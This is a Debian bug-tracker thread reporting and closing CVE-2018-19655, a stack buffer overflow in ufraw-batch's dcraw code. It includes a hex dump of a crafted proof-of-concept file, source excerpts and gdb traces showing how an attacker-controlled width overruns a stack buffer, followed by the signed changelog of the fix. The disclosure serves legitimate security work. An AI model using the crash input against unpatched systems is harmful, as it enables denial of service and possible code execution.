Your message dated Fri, 07 Dec 2018 10:34:29 +0000 with message-id <e1gvdsn-000cp6...@fasolo.debian.org> and subject line Bug#890086: fixed in ufraw 0.22-3.1 has caused the Debian Bug report #890086, regarding ufraw: CVE-2018-19655: stack buffer overflow while running ufraw-batch to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 890086: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=890086 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: ufraw-batch Version: 0.22-2 Severity: important Tags: security stack buffer overflow running ufraw-batch with "--overwrite poc" option Running 'ufraw-batch --overwrite poc' with the attached file raises stack buffer overflow which may allow a remote attacker to cause unspecified impact including denial-of-service attack I expected the program to terminate without segfault, but the program crashes as follow june@june:~/temp/report/ufraw-batch/unknown$ ufraw-batch poc *** stack smashing detected ***: ufraw-batch terminated Segmentation fault Below is debugging information about this bug 0. poc file 00000000: 0001 0001 0040 2020 0000 0020 2020 4b41 .....@ ... KA 00000010: 492d 3033 3430 200f 4343 4343 4343 4343 I-0340 .CCCCCCCC 00000020: 4343 4343 4343 4343 4343 [4141] 6565 CCCCCCCCCCAAee 1. Above two bytes [4141] was stored in the variable 'raw_width' in DCRaw::identify function at dcraw.cc 8871 } else if (!memcmp (head,"\0\001\0\001\0@",6)) { 8872 fseek (ifp, 6, SEEK_SET); 8873 fread (make, 1, 8, ifp); 8874 fread (model, 1, 8, ifp); 8875 fread (model2, 1, 16, ifp); 8876 data_offset = get2(); 8877 get2(); 8878 raw_width = get2(); // HERE 8879 raw_height = get2(); 8880 load_raw = &CLASS nokia_load_raw; 8881 filters = 0x61616161; --gdb-- 8878 raw_width = get2(); (gdb) n 8879 raw_height = get2(); (gdb) p/x raw_width $21 = 0x4141 ------- 2. And then it stored in the varaible 'width' in the same function 9008 desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0; 9009 if (!is_raw) goto notraw; 9010 9011 if (!height) height = raw_height; 9012 if (!width) width = raw_width; // HERE 9013 if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */ 9014 { height = 2616; width = 3896; } 9015 if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */ --gdb-- Breakpoint 9, DCRaw::identify (this=this@entry=0x7ffff48b2010) at dcraw.cc:9012 9012 if (!width) width = raw_width; $24 = 0 (gdb) n 9013 if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */ (gdb) p/x width $25 = 0x4141 3. This 'width' was used in the below loop in the function DCRaw::find_green at the same file. 8504 float CLASS find_green (int bps, int bite, int off0, int off1) 8505 { 8506 UINT64 bitbuf=0; 8507 int vbits, col, i, c; 8508 ushort img[2][2064]; 8509 double sum[]={0,0}; 8510 8511 FORC(2) { 8512 fseek (ifp, c ? off1:off0, SEEK_SET); 8513 for (vbits=col=0; col < width; col++) { // HERE(1), width was used 8514 for (vbits -= bps; vbits < 0; vbits += bite) { 8515 bitbuf <<= bite; 8516 for (i=0; i < bite; i+=8) 8517 bitbuf |= (unsigned) (fgetc(ifp) << i); 8518 } 8519 img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps); // HERE(2), col is index of img buffer 8520 } 8521 } 8522 FORC(width-1) { 8523 sum[ c & 1] += ABS(img[0][c]-img[1][c+1]); 8524 sum[~c & 1] += ABS(img[1][c]-img[0][c+1]); 8525 } 8526 return 100 * log(sum[0]/sum[1]); 8527 } At HERE(2) because local variable 'col' increased until being same as variable 'width' which can be easily modified by input file and can have big enough value to overwrite local buffer img. ========================================================================= This bug was found with a fuzzer developed by 'SoftSec' group at KAIST -- System Information: Debian Release: 9.3 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'unstable'), (500, 'testing'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 4.9.0-3-amd64 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages ufraw-batch depends on: ii libbz2-1.0 1.0.6-8.1 ii libc6 2.24-11+deb9u1 ii libexiv2-14 0.25-3.1 ii libgcc1 1:6.3.0-18 ii libglib2.0-0 2.50.3-2 ii libgomp1 6.3.0-18 ii libjpeg62-turbo 1:1.5.1-2 ii liblcms2-2 2.8-4 ii liblensfun1 0.3.2-3 ii libpng16-16 1.6.28-1 ii libstdc++6 6.3.0-18 ii libtiff5 4.0.8-2+deb9u2 ii zlib1g 1:1.2.8.dfsg-5 ufraw-batch recommends no packages. Versions of packages ufraw-batch suggests: pn ufraw <none> -- no debconf information
poc
Description: Binary data
--- End Message ---
--- Begin Message ---Source: ufraw Source-Version: 0.22-3.1 We believe that the bug you reported is fixed in the latest version of ufraw, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 890...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Salvatore Bonaccorso <car...@debian.org> (supplier of updated ufraw package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Sun, 02 Dec 2018 10:55:01 +0100 Source: ufraw Binary: ufraw ufraw-batch gimp-ufraw Architecture: source Version: 0.22-3.1 Distribution: unstable Urgency: medium Maintainer: Hubert Chathi <uho...@debian.org> Changed-By: Salvatore Bonaccorso <car...@debian.org> Closes: 890086 Description: gimp-ufraw - gimp importer for raw camera images ufraw - standalone importer for raw camera images ufraw-batch - batch importer for raw camera images Changes: ufraw (0.22-3.1) unstable; urgency=medium . * Non-maintainer upload. * stack-based buffer overflow bug (CVE-2018-19655) (Closes: #890086) Checksums-Sha1: 4e974886a4ec3a379d03d48a58588506d15f16a3 2127 ufraw_0.22-3.1.dsc 0fc453b0924c4df46276533d00e8766835763b07 8672 ufraw_0.22-3.1.debian.tar.xz Checksums-Sha256: dc869baa14afba40691f753d2312f1a97c24eb51d952f2f86697672fa9b14d48 2127 ufraw_0.22-3.1.dsc 27176a7e800cc47497d82b5fb333977a578f59eb309e9ad71446327ba05fa9a7 8672 ufraw_0.22-3.1.debian.tar.xz Files: 9a667e8d59ca7c43f19e52df76e0eec2 2127 graphics optional ufraw_0.22-3.1.dsc 4d4a2cabb9e3f14b9d9002b266dba948 8672 graphics optional ufraw_0.22-3.1.debian.tar.xz -----BEGIN PGP SIGNATURE----- iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlwDrbxfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk ZWJpYW4ub3JnAAoJEAVMuPMTQ89E1WQP/0bdvRZn6WZaUROeZ0dx3lo4w/p4LonI EscJ5iqeVOwYM/Zx2/Ao81aMGcGAiu7oppnKTxA4TAsdIPmu/L+LQfRPKxsJjDAl VYVIiR5h7CRgHCjdTGgSjFrD03YyxeKXB3F+f1FjUcuF9IAcEr8MR9nPDsB3plrQ XyUhUqNYwWJIkhnWKEYt0VuSc4Vz4NNwBHYKuizZP/1QaItZ0YKb3Nj2gY+9ig4d 7LM7zqe8+t9NVFm9786SnLKMCKAWBtPK++7+Zr8/mTow7Qm2675rKifYRwjWvbBB hfUGeS2NaPTi75gvva+SguniI+hQV2FrJRkTJ4PPGL92kYPNuqkTbNFRydkTMPVA HhFlOYlZHZj08aBIxgOnTCJQ70zg0RBdOo3lcEfSjrHu/NQIk9vqCJc+ij9kyM8+ HtcD6FFH7sq1H6mrnfOFXHzNwt9oxDoBeMZ3q+R6yU8WWjrKQv+uQENENDk3vvou htV+BmimUu5CmPoqu5b/EFIHFE9hSQVptfeGSeAtNSRDaQU37TKKCQ5gjzpA9O/o 1SJf7xQsXPG0sRYR61hBX0W74c80Pru4fjn9DrW+kRlbxzKFxUDHnYW+5nMw1XrH 9+uslIPZ62vB43v9yAFbOM20Apg4/TFjCznLEzpcF8mEsL91y4E3JRM7zp+sy+RN uh1R2u0ZAb+I =+9eT -----END PGP SIGNATURE-----
--- End Message ---
